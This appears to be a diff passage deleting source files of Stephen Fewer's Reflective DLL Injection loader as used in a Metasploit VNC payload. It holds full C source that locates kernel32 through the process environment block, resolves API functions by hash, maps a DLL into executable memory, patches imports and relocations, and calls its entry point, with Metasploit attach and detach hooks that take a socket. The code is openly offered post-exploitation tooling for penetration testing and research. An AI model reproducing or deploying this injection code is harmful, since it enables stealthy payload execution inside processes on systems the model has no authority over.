||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
|
|
||||||
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
|
|
||||||
//===============================================================================================//
|
|
||||||
#define WIN32_LEAN_AND_MEAN
|
|
||||||
#include <windows.h>
|
|
||||||
|
|
||||||
// we declare some common stuff in here...
|
|
||||||
|
|
||||||
#define DLL_METASPLOIT_ATTACH 4
|
|
||||||
#define DLL_METASPLOIT_DETACH 5
|
|
||||||
#define DLL_QUERY_HMODULE 6
|
|
||||||
|
|
||||||
#define DEREF( name )*(UINT_PTR *)(name)
|
|
||||||
#define DEREF_64( name )*(DWORD64 *)(name)
|
|
||||||
#define DEREF_32( name )*(DWORD *)(name)
|
|
||||||
#define DEREF_16( name )*(WORD *)(name)
|
|
||||||
#define DEREF_8( name )*(BYTE *)(name)
|
|
||||||
|
|
||||||
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
|
|
||||||
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
|
|
||||||
|
|
||||||
#define DLLEXPORT __declspec( dllexport )
|
|
||||||
|
|
||||||
//===============================================================================================//
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,451 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#include "ReflectiveLoader.h"
|
|
||||||
//===============================================================================================//
|
|
||||||
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
|
|
||||||
HINSTANCE hAppInstance = NULL;
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifdef _WIN64
|
|
||||||
#pragma intrinsic( _ReturnAddress )
|
|
||||||
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
||||||
|
|
||||||
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
|
|
||||||
// otherwise the DllMain at the end of this file will be used.
|
|
||||||
|
|
||||||
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
|
|
||||||
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
|
|
||||||
|
|
||||||
// This is our position independent reflective DLL loader/injector
|
|
||||||
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
|
|
||||||
#else
|
|
||||||
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
|
|
||||||
#endif
|
|
||||||
{
|
|
||||||
// the functions we need
|
|
||||||
LOADLIBRARYA pLoadLibraryA;
|
|
||||||
GETPROCADDRESS pGetProcAddress;
|
|
||||||
VIRTUALALLOC pVirtualAlloc;
|
|
||||||
USHORT usCounter;
|
|
||||||
|
|
||||||
// the initial location of this image in memory
|
|
||||||
UINT_PTR uiLibraryAddress;
|
|
||||||
// the kernels base address and later this images newly loaded base address
|
|
||||||
UINT_PTR uiBaseAddress;
|
|
||||||
|
|
||||||
// variables for processing the kernels export table
|
|
||||||
UINT_PTR uiAddressArray;
|
|
||||||
UINT_PTR uiNameArray;
|
|
||||||
UINT_PTR uiExportDir;
|
|
||||||
UINT_PTR uiNameOrdinals;
|
|
||||||
DWORD dwHashValue;
|
|
||||||
|
|
||||||
// variables for loading this image
|
|
||||||
UINT_PTR uiHeaderValue;
|
|
||||||
UINT_PTR uiValueA;
|
|
||||||
UINT_PTR uiValueB;
|
|
||||||
UINT_PTR uiValueC;
|
|
||||||
UINT_PTR uiValueD;
|
|
||||||
|
|
||||||
// STEP 0: calculate our images current base address
|
|
||||||
|
|
||||||
// we will start searching backwards from our current EIP
|
|
||||||
#ifdef _WIN64
|
|
||||||
uiLibraryAddress = eip();
|
|
||||||
#else
|
|
||||||
__asm call geteip
|
|
||||||
__asm geteip: pop uiLibraryAddress
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// loop through memory backwards searching for our images base address
|
|
||||||
// we dont need SEH style search as we shouldnt generate any access violations with this
|
|
||||||
while( TRUE )
|
|
||||||
{
|
|
||||||
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
|
|
||||||
{
|
|
||||||
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
|
|
||||||
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
|
|
||||||
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
|
|
||||||
{
|
|
||||||
uiHeaderValue += uiLibraryAddress;
|
|
||||||
// break if we have found a valid MZ/PE header
|
|
||||||
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
uiLibraryAddress--;
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 1: process the kernels exports for the functions our loader needs...
|
|
||||||
|
|
||||||
// get the Process Enviroment Block
|
|
||||||
#ifdef _WIN64
|
|
||||||
uiBaseAddress = __readgsqword( 0x60 );
|
|
||||||
#else
|
|
||||||
uiBaseAddress = __readfsdword( 0x30 );
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
|
|
||||||
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
|
|
||||||
|
|
||||||
// get the first entry of the InMemoryOrder module list
|
|
||||||
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
|
|
||||||
while( uiValueA )
|
|
||||||
{
|
|
||||||
// get pointer to current modules name (unicode string)
|
|
||||||
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
|
|
||||||
// set bCounter to the length for the loop
|
|
||||||
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
|
|
||||||
// clear uiValueC which will store the hash of the module name
|
|
||||||
uiValueC = 0;
|
|
||||||
// compute the hash of the module name...
|
|
||||||
do
|
|
||||||
{
|
|
||||||
uiValueC = ror( (DWORD)uiValueC );
|
|
||||||
// normalize to uppercase if the madule name is in lowercase
|
|
||||||
if( *((BYTE *)uiValueB) >= 'a' )
|
|
||||||
uiValueC += *((BYTE *)uiValueB) - 0x20;
|
|
||||||
else
|
|
||||||
uiValueC += *((BYTE *)uiValueB);
|
|
||||||
uiValueB++;
|
|
||||||
} while( --usCounter );
|
|
||||||
// compare the hash with that of kernel32.dll
|
|
||||||
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
|
|
||||||
{
|
|
||||||
// get this modules base address
|
|
||||||
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
// get the next entry
|
|
||||||
uiValueA = DEREF( uiValueA );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the VA of the modules NT Header
|
|
||||||
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// uiNameArray = the address of the modules export directory entry
|
|
||||||
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
|
|
||||||
|
|
||||||
// get the VA of the export directory
|
|
||||||
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
|
|
||||||
|
|
||||||
// get the VA for the array of name pointers
|
|
||||||
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
|
|
||||||
|
|
||||||
// get the VA for the array of name ordinals
|
|
||||||
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
|
|
||||||
|
|
||||||
usCounter = 3;
|
|
||||||
|
|
||||||
// loop while we still have imports to find
|
|
||||||
while( usCounter > 0 )
|
|
||||||
{
|
|
||||||
// compute the hash values for this function name
|
|
||||||
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
|
|
||||||
|
|
||||||
// if we have found a function we want we get its virtual address
|
|
||||||
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
|
|
||||||
{
|
|
||||||
// get the VA for the array of addresses
|
|
||||||
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
|
|
||||||
|
|
||||||
// use this functions name ordinal as an index into the array of name pointers
|
|
||||||
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
|
|
||||||
|
|
||||||
// store this functions VA
|
|
||||||
if( dwHashValue == LOADLIBRARYA_HASH )
|
|
||||||
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
else if( dwHashValue == GETPROCADDRESS_HASH )
|
|
||||||
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
else if( dwHashValue == VIRTUALALLOC_HASH )
|
|
||||||
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
|
|
||||||
// decrement our counter
|
|
||||||
usCounter--;
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next exported function name
|
|
||||||
uiNameArray += sizeof(DWORD);
|
|
||||||
|
|
||||||
// get the next exported function name ordinal
|
|
||||||
uiNameOrdinals += sizeof(WORD);
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 2: load our image into a new permanent location in memory...
|
|
||||||
|
|
||||||
// get the VA of the NT Header for the PE to be loaded
|
|
||||||
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
|
|
||||||
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
|
|
||||||
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
|
||||||
|
|
||||||
// we must now copy over the headers
|
|
||||||
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
|
|
||||||
uiValueB = uiLibraryAddress;
|
|
||||||
uiValueC = uiBaseAddress;
|
|
||||||
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
|
|
||||||
|
|
||||||
// STEP 3: load in all of our sections...
|
|
||||||
|
|
||||||
// uiValueA = the VA of the first section
|
|
||||||
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
|
|
||||||
|
|
||||||
// itterate through all sections, loading them into memory.
|
|
||||||
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
|
|
||||||
{
|
|
||||||
// uiValueB is the VA for this section
|
|
||||||
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
|
|
||||||
|
|
||||||
// uiValueC if the VA for this sections data
|
|
||||||
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
|
|
||||||
|
|
||||||
// copy the section over
|
|
||||||
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
|
|
||||||
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
|
|
||||||
|
|
||||||
// get the VA of the next section
|
|
||||||
uiValueA += sizeof( IMAGE_SECTION_HEADER );
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 4: process our images import table...
|
|
||||||
|
|
||||||
// uiValueB = the address of the import directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
|
|
||||||
|
|
||||||
// we assume their is an import table to process
|
|
||||||
// uiValueC is the first entry in the import table
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// itterate through all imports
|
|
||||||
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
|
|
||||||
{
|
|
||||||
// use LoadLibraryA to load the imported module into memory
|
|
||||||
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
|
|
||||||
|
|
||||||
// uiValueD = VA of the OriginalFirstThunk
|
|
||||||
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
|
|
||||||
|
|
||||||
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
|
|
||||||
|
|
||||||
// itterate through all imported functions, importing by ordinal if no name present
|
|
||||||
while( DEREF(uiValueA) )
|
|
||||||
{
|
|
||||||
// sanity check uiValueD as some compilers only import by FirstThunk
|
|
||||||
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
|
|
||||||
{
|
|
||||||
// get the VA of the modules NT Header
|
|
||||||
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// uiNameArray = the address of the modules export directory entry
|
|
||||||
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
|
|
||||||
|
|
||||||
// get the VA of the export directory
|
|
||||||
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
|
|
||||||
|
|
||||||
// get the VA for the array of addresses
|
|
||||||
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
|
|
||||||
|
|
||||||
// use the import ordinal (- export ordinal base) as an index into the array of addresses
|
|
||||||
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
|
|
||||||
|
|
||||||
// patch in the address for this imported function
|
|
||||||
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
// get the VA of this functions import by name struct
|
|
||||||
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
|
|
||||||
|
|
||||||
// use GetProcAddress and patch in the address for this imported function
|
|
||||||
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
|
|
||||||
}
|
|
||||||
// get the next imported function
|
|
||||||
uiValueA += sizeof( UINT_PTR );
|
|
||||||
if( uiValueD )
|
|
||||||
uiValueD += sizeof( UINT_PTR );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next import
|
|
||||||
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 5: process all of our images relocations...
|
|
||||||
|
|
||||||
// calculate the base address delta and perform relocations (even if we load at desired image base)
|
|
||||||
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
|
|
||||||
|
|
||||||
// uiValueB = the address of the relocation directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
|
|
||||||
|
|
||||||
// check if their are any relocations present
|
|
||||||
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
|
|
||||||
{
|
|
||||||
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// and we itterate through all entries...
|
|
||||||
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
|
|
||||||
{
|
|
||||||
// uiValueA = the VA for this relocation block
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
|
|
||||||
|
|
||||||
// uiValueB = number of entries in this relocation block
|
|
||||||
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
|
|
||||||
|
|
||||||
// uiValueD is now the first entry in the current relocation block
|
|
||||||
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
|
|
||||||
|
|
||||||
// we itterate through all the entries in the current block...
|
|
||||||
while( uiValueB-- )
|
|
||||||
{
|
|
||||||
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
|
|
||||||
// we dont use a switch statement to avoid the compiler building a jump table
|
|
||||||
// which would not be very position independent!
|
|
||||||
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
|
|
||||||
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
|
|
||||||
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
|
|
||||||
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
|
|
||||||
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
|
|
||||||
|
|
||||||
// get the next entry in the current relocation block
|
|
||||||
uiValueD += sizeof( IMAGE_RELOC );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next entry in the relocation directory
|
|
||||||
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
|
|
||||||
/*
|
|
||||||
// uiValueB = the address of the relocation directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
|
|
||||||
// check if their are any exception etries present
|
|
||||||
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
|
|
||||||
{
|
|
||||||
// get the number of entries
|
|
||||||
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
|
|
||||||
|
|
||||||
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// itterate through all entries
|
|
||||||
while( uiValueA-- )
|
|
||||||
{
|
|
||||||
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
|
|
||||||
|
|
||||||
// get the next entry
|
|
||||||
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
|
|
||||||
}
|
|
||||||
}
|
|
||||||
*/
|
|
||||||
// STEP 7: call our images entry point
|
|
||||||
|
|
||||||
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
|
|
||||||
|
|
||||||
// call our respective entry point, fudging our hInstance value
|
|
||||||
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
|
|
||||||
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
|
|
||||||
#else
|
|
||||||
// if we are injecting an DLL via a stub we call DllMain with no parameter
|
|
||||||
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
|
|
||||||
return uiValueA;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
||||||
|
|
||||||
// you must implement this function...
|
|
||||||
extern DWORD DLLEXPORT Init( SOCKET socket );
|
|
||||||
|
|
||||||
BOOL MetasploitDllAttach( SOCKET socket )
|
|
||||||
{
|
|
||||||
Init( socket );
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
BOOL MetasploitDllDetach( DWORD dwExitFunc )
|
|
||||||
{
|
|
||||||
switch( dwExitFunc )
|
|
||||||
{
|
|
||||||
case EXITFUNC_SEH:
|
|
||||||
SetUnhandledExceptionFilter( NULL );
|
|
||||||
break;
|
|
||||||
case EXITFUNC_THREAD:
|
|
||||||
ExitThread( 0 );
|
|
||||||
break;
|
|
||||||
case EXITFUNC_PROCESS:
|
|
||||||
ExitProcess( 0 );
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
|
|
||||||
{
|
|
||||||
BOOL bReturnValue = TRUE;
|
|
||||||
switch( dwReason )
|
|
||||||
{
|
|
||||||
case DLL_METASPLOIT_ATTACH:
|
|
||||||
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
|
|
||||||
break;
|
|
||||||
case DLL_METASPLOIT_DETACH:
|
|
||||||
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
|
|
||||||
break;
|
|
||||||
case DLL_QUERY_HMODULE:
|
|
||||||
if( lpReserved != NULL )
|
|
||||||
*(HMODULE *)lpReserved = hAppInstance;
|
|
||||||
break;
|
|
||||||
case DLL_PROCESS_ATTACH:
|
|
||||||
hAppInstance = hinstDLL;
|
|
||||||
break;
|
|
||||||
case DLL_PROCESS_DETACH:
|
|
||||||
case DLL_THREAD_ATTACH:
|
|
||||||
case DLL_THREAD_DETACH:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
return bReturnValue;
|
|
||||||
}
|
|
||||||
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,197 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
